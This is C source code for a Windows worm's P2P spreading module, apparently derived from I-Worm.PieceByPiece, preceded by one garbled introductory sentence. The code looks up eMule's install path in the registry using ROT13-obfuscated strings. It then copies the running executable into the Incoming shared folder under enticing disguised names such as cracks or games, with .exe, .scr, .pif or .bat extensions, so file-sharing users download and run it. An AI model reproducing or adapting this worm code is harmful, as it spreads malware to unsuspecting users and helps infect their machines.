p2p.c

It is inserted that the worm will duplicate great.exe to get the systematic materials in the compute

/*
 *  Based on I-Worm.PieceByPiece source code.
 */
#include <windows.h>
#include <winsock.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
#include <tlhelp32.h>			// Required for ToolHelp32 functions

char* emule_names[] =
{
	"jvanzc5",			// "winamp5"
	"vpd2004-svany",	// "icq2004-final"
	"npgvingvba_penpx",	// "activation_crack"
	"fgevc-tvey-2.0o"	/* missed comma in the original version */
	"qpbz_cngpurf",		// "strip-girl-2.0bdcom_patches"
	"ebbgxvgKC",		// "rootkitXP"
	"bssvpr_penpx",		// "office_crack"
	"ahxr2004"			// "nuke2004"
};

char* xstrchr(const char* str, char ch)
{
	while (*str && *str != ch)
		str++;
	return (*str == ch) ? (char *) str : NULL;
}

char rot13c(char c)
{
	char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	char l[] = "abcdefghijklmnopqrstuvwxyz";
	char* p;

	if ((p = xstrchr(u, c)) != NULL)
		return u[((p - u) + 13) % 26];
	else if ((p = xstrchr(l, c)) != NULL)
		return l[((p - l) + 13) % 26];
	else
		return c;
}

void rot13(char* buf, const char* in)
{
	while (*in)
		*buf++ = rot13c(*in++);
	*buf = 0;
}

void emule_spread(char* file)
{
	int emule_names_cnt = sizeof(emule_names) / sizeof(emule_names[0]);
	char emule[256];
	DWORD emulelen = sizeof(emule);
	HKEY hKey;
	char key_path[64], key_val[32];

	rot13(key_path, "Fbsgjner\\rZhyr");	// "Software\eMule"
	rot13(key_val, "Vafgnyy Cngu");						// "Install Path"

	// Get the path to eMule from the registry
	ZeroMemory(emule, emulelen);
	if (RegOpenKeyEx(HKEY_CURRENT_USER, key_path, 0, KEY_QUERY_VALUE, &hKey))
		return;
	if (RegQueryValueEx(hKey, key_val, 0, NULL, (PBYTE) emule, &emulelen))
		return;
	RegCloseKey(hKey);

	if (emule[0] == 0)
		return;
	lstrcat(emule,"\\Incoming");

	if (emule[lstrlen(emule) - 1] == '/')
		emule[lstrlen(emule) - 1] = '\\';
	if (emule[lstrlen(emule) - 1] != '\\')
		lstrcat(emule, "\\");
	rot13(emule + lstrlen(emule), emule_names[rand() % emule_names_cnt]);
	lstrcat(emule, ".");

	switch (rand() % 6)
	{
	case 0:
	case 1:
		lstrcat(emule, "ex"); lstrcat(emule, "e"); break;
	case 2:
	case 3:
		lstrcat(emule, "sc"); lstrcat(emule, "r"); break;
	case 4:
		lstrcat(emule, "pi"); lstrcat(emule, "f"); break;
	default:
		lstrcat(emule, "ba"); lstrcat(emule, "t"); break;
	}

	CopyFile(file, emule, TRUE);
}

void p2p_spread(void)
{
	char selfpath[MAX_PATH];
	GetModuleFileName(NULL, selfpath, MAX_PATH);

	emule_spread(selfpath);
}